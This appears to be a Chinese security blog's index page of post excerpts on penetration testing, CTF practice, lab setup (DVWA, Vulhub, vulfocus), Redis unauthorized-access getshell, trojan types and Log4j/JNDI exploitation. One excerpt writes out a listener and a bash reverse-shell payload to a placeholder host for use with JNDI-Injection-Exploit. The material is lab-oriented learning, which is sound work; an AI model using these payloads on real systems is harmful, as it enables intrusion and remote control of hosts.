qq_26579613的博客

vulfocus-Fastjson(CNVD-2017-02833）验证

php反序列化讲解-入门

ctf-web题型总结

1、Redis1.1 背景在内网渗透中，设置为空口令或者弱口令的Redis大量存在，以此为跳板，或许能有收获。Redis 是一个高性能的key-value数据库，Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步，从服务器可以是关联其他从服务器的主服务器。简而言之，Redis可以提供高效率的数据查询服务。1.2 漏洞利用思路Redis本身漏洞较少，它主要存在的漏洞还是未授权访问漏洞，总共有三种主流的提权方式，这里分别进行讲解。1.2.1 直接写getshell

1、木马类型本文仅介绍与渗透攻击密切相关的木马。1.1 远程控制型木马以让攻击者完全控制被入侵的主机，攻击者可以利用它完成一些甚至连主机主人本身都不能顺利进行的操作。该种类的木马往往集成了其他种类木马的功能，可以任意访问文件、获取目标主机用户的私人信息，包括信用卡、银行账号等至关重要的信息。1.2 密码发送木马密码发送木马是为专门盗取被感染主机上的密码而编写的，木马一旦被执行，就会自动搜索内存、 Cache、临时文件夹以及各种敏感密码文件，一旦搜索到有用的密码，木马就会利用免费的电子邮件

以 https://mp.youkuaiyun.com/mp_blog/creation/editor为例0、获取资产（1）通过fofa（2）通过友情网站1、针对URL本身（1）看网站搭建，web指纹扫描--railgun--开源软件漏洞，log4j2、shiro、fastjson、weblogic--去github寻找扫描器，比如 shiro exp；（2）针对域名，用oneForAll去做子域名的解析、遍历；也可以用御剑做目录遍历--相关的url、大量的ip，可以通过Ehole.

1、MISC介绍MISC，中文即杂项，包括隐写，数据还原，脑洞、社会工程、压缩包解密、流量分析取证、与信息安全相关的大数据等。竞赛过程中解MISC时会涉及到各种脑洞，各种花式技巧，主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。2、隐写术隐写术包括图片、音频、视频等文件隐写，在处理这类问题时，应优先确认该文件的实际类型，可参考下图，查看其文件头信息。常用以下工具：1、010editor查看文件类型2、Binwalk合并文件3、Notepad++进行

DVWA：web靶场练习平台建议学习安全的同事熟练掌握DVWA所有漏洞。DVWA简介及搭建_Touchl的博客-优快云博客_dvwa​​​​​​​j另外，学习漏洞时，推荐在网上搜索 DVWA教程、DVWA通关等进行练习。Sqli-labs：SQL注入练习平台【SQL注入】windows下sqli-labs的搭建_spectre-优快云博客_sqli搭建虽然现在有SqlMap这种工具，手动注入还是要有基本的了解。Vulhub：漏洞复现和练习平台本人之前的博客有搭建教程。.

1、虚拟机软件选择Windows推荐使用VMware，建议使用破解版即可。Mac推荐使用VMware Fusion，或者Parallels Desktop，但是没有VMware好用。2、镜像下载建立自己的攻击机或者实验机器，推荐使用正版镜像Windows推荐msdn资源，上面还有一些其他的工具。MSDN, 我告诉你 - 做一个安静的工具站Linux做网络攻击需要有个Linux的系统，作为攻击机或者实验靶机。推荐使用安全攻击专用的Kali，里面集成了许多攻击工具

一、学习资源推荐个人推荐直接在菜鸟教程学习，相关命令可以在Kali尝试效果。Linux 教程 | 菜鸟教程二、linux目录结构Linux目录结构见下图，一般经常隐藏Flag的是：1、tmp2、etcroot三 、Linux攻击常用命令1、目录操作cd：进入其他目录，例如cd /rootls：浏览当前目录有哪些信息，一般用ls或者ls -lartpwd：查看当前自己在哪个目录mkdir：创建一个新的目录mkdir -p /bridy其余

1、Vulhub介绍Vulhub是一个基于docker和docker-compose的漏洞环境集合，进入对应目录并执行一条语句即可启动一个全新的漏洞环境，让漏洞复现变得更加简单，让安全研究者更加专注于漏洞原理本身。2、Vulhub安装pip install docker-composewget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zipunzip vulhub-master.zip

1、VPS打开监听nc -lvvp 4444#顺便写个payloadbash -i >& /dev/tcp/your-ip/8888 0>&12、payload转化java.lang.Runtime.exec() Payload Workarounds - @Jackson_T准备真正的payloadjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "上面的payload" -A

1、环境准备2、工具准备2.1安装JNDI-Injection-Exploit git clone https://github.com/welk1n/JNDI-Injection-Exploit.git2.2 安装MVNmkdip -p /usr/local/apache-mavencd /usr/local/apache-mavenwget -c https://dlcdn.apache.org/maven/maven-3/3.8.4/bin...

建议内网搭建

信息安全学习导图

frp/Neo-reGeorg/proxyfier/sockcap64

PHP魔术方法整理方法名 作用 __construct 构造函数，在创建对象时候初始化对象，一般用于对变量赋初值 __destruct 析构函数，和构造函数相反，在对象不再被使用时(将所有该对象的引用设为null)或者程序退出时自动调用 __toString 当一个对象被当作一个字符串被调用，把类当作字符串使用时触发，返回值需要为字符串，例如echo打印出对象就会调用此方法 __wakeup() 使用unserialize时触发，反序列化恢复对象...